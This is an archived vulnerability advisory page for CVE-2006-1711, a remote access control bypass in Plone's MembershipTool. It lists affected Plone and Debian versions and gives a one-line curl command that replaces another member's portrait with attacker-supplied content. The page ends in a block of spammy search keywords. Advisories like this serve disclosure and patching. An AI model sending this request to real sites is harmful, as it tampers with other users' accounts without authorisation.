about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Plone MembershipTool Access Control Bypass Vulnerability


Title Plone MembershipTool Access Control Bypass Vulnerability
Published 2006-04-12-12:00AM
Updated 2006-04-12-11:22PM
Class Access Validation Error
CVE   CVE-2006-1711
Remote  Yes
Local  No
Credit  mj reported this issue to the vendor.
Vulnerable  Plone Plone 2.1.2
Plone Plone 2.0.5
Plone Plone 2.0.4
Plone Plone 2.5beta1
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia64
Debian Linux 3.1 ia32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Not Vulnerable  
Code   Attackers may use standard web client applications to exploit this issue.

The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:

curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 08:26:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sandra dew colors swa mambo+Remo vuln%2Fexp t995t WWWWORLDSE bipashasex mambo Remo news for c www.zzwsc. Sofias pho www.silkro fire soft User phpbb++por nat www.80845. crack+data Trish sexs Sign in to Crack Data xoops incl sexyvideos yq180.cn pakistani lesbian as www.80845. nude priya news for c sex viodes www.bidose phpraid 3. www.wuyuet sex viodes mambo Remo fotes sex Subdreamer Www.young SAX+89 sexygirlsi SNOM Berger pai bipashasex maxcpm.inf maxcpm.inf www.hotlad mambo Remo indian +se Indian vid www.taobao